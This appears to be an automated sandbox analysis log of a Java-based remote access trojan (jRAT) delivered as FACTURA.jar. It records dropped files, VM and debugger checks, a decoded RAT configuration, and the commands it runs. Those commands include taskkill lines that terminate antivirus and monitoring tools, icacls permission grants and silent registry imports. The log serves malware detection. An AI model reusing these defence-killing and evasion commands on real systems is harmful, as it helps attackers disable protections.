Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\msvcp140.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\keytool.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\wsdetect.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2native.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\npt.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfr.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\unpack200.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsdt.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge-32.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\instrument.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsound.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\rmiregistry.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge-32.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2iexp.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2ssv.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ssv.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsoundds.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\rmid.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jli.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\nio.dll Jump to dropped file
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Found large amount of non-executed APIs
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe API coverage: 1.2 %
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: javaw.exe, 00000006.00000002.2840070588.0000000005529000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A9E0000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2840070588.00000000051F2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A996000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Description=Microsoft Hyper-V Virtualization Infrastructure Driver
Source: javaw.exe, 00000006.00000002.2840070588.00000000051F2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: BDescription=Microsoft Hyper-V Virtualization Infrastructure Driver
Source: java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: {"NETWORK":[{"PORT":7777,"DNS":"127.0.0.1"}],"INSTALL":false,"MODULE_PATH":"zS/lq/BTk.GI","PLUGIN_FOLDER":"DdWDtpinxpf","JRE_FOLDER":"HSIROD","JAR_FOLDER":"fUTkALeaTxM","JAR_EXTENSION":"Vybgol","ENCRYPT_KEY":"cPFjgddXIBcXBCIseEuXTZjwi","DELAY_INSTALL":2,"NICKNAME":"User","VMWARE":false,"PLUGIN_EXTENSION":"DhjWU","WEBSITE_PROJECT":"https://jrat.io","JAR_NAME":"uiylKSALYJr","JAR_REGISTRY":"WLyQyhWoosi","DELAY_CONNECT":2,"VBOX":false}
Source: java.exe, 00000007.00000003.1677653685.0000000014A61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: javaw.exe, 00000006.00000002.2840070588.0000000005529000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A9E0000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2840070588.00000000051F2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A996000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: DeviceName=Microsoft Hyper-V Virtualization Infrastructure Driver
Source: java.exe, 00000007.00000003.1677653685.0000000014A61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: wscript.exe, 00000005.00000002.1687062171.0000000006C97000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: javaw.exe, 00000006.00000002.2840070588.00000000051F2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Adevicename=microsoft hyper-v virtualization infrastructure driver
Source: xcopy.exe, 00000015.00000003.1714657743.000000000348F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: JVM version %s (%s, %s)VirtualMachineImpl.cRedefineClassesGetTopThreadGroupsJNI_FALSENewStringUTF;classTrack.csignaturessignature bagDeleteWeakGlobalRefclassTrack tableloaded classesAttempting to insert duplicate classKlassNodesignatureNewWeakGlobalRefloaded classes arraycommonRef.cSetTagFreeing %d (%x)
Source: java.exe, 00000002.00000002.1633856947.000000000079B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2838895085.0000000001528000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2838841049.00000000008FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [Ljava/lang/VirtualMachineError;
Source: xcopy.exe, 00000015.00000003.1714657743.000000000348F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VirtualMachineImpl.c
Source: java.exe, 00000007.00000003.1677653685.0000000014A61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: java.exe, 00000002.00000002.1633856947.000000000079B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2838895085.0000000001528000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2838841049.00000000008FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cjava/lang/VirtualMachineError
Source: wscript.exe, 00000005.00000002.1687062171.0000000006C97000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: javaw.exe, 00000006.00000002.2840070588.00000000051F2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREK<
Source: java.exe, 00000007.00000002.2840004492.0000000004870000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE
Source: javaw.exe, 00000006.00000002.2840070588.00000000051F2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ADeviceName=Microsoft Hyper-V Virtualization Infrastructure Driver
Source: java.exe, 00000002.00000002.1633856947.000000000079B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3L
Source: java.exe, 00000002.00000003.1616717208.0000000014552000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1672908126.00000000154CE000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1677653685.0000000014A61000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1772397324.000000000357A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: java/lang/VirtualMachineError.classPK
Source: java.exe, 00000007.00000002.2840004492.0000000004A4F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE8
Source: java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: {"NETWORK":[{"PORT":7777,"DNS":"127.0.0.1"}],"INSTALL":false,"MODULE_PATH":"zS/lq/BTk.GI","PLUGIN_FOLDER":"DdWDtpinxpf","JRE_FOLDER":"HSIROD","JAR_FOLDER":"fUTkALeaTxM","JAR_EXTENSION":"Vybgol","ENCRYPT_KEY":"cPFjgddXIBcXBCIseEuXTZjwi","DELAY_INSTALL":2,"NICKNAME":"User","VMWARE":false,"PLUGIN_EXTENSION":"DhjWU","WEBSITE_PROJECT":"https://jrat.io","JAR_NAME":"uiylKSALYJr","JAR_REGISTRY":"WLyQyhWoosi","DELAY_CONNECT":2,"VBOX":false}
Source: javaw.exe, 00000006.00000002.2838895085.0000000001528000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2838841049.00000000008FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: javaw.exe, 00000006.00000002.2840070588.00000000051F2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Bdescription=microsoft hyper-v virtualization infrastructure driver
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information queried: ProcessInformation
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_73AC2C97 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_73AC2C97
Contains functionality to dynamically determine API calls
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_73AC45FB LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 6_2_73AC45FB
Enables debug privileges
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_73AC2C97 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_73AC2C97
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_73AC1244 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_73AC1244
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Memory protected: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Excessive usage of taskkill to terminate processes
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MsMpEng.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpCmdRun.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mergecap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM dumpcap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamscheduler.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamservice.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM AdAwareService.exe /T /F Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\FACTURA.jar" Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\wscript.exe wscript C:\Users\user\gcahfpmhcn.js Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\ultekbvsw.txt" Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -jar C:\Users\user\AppData\Local\Temp\_0.963648387626213409653739306438380.class Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4451837785175678294.vbs Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive536118811270301171.vbs Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\mqjqrgZaqQ856862126040995288.reg Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive2729271214941122137.vbs Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MsMpEng.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpCmdRun.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mergecap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM dumpcap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamscheduler.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamservice.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM AdAwareService.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive536118811270301171.vbs Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
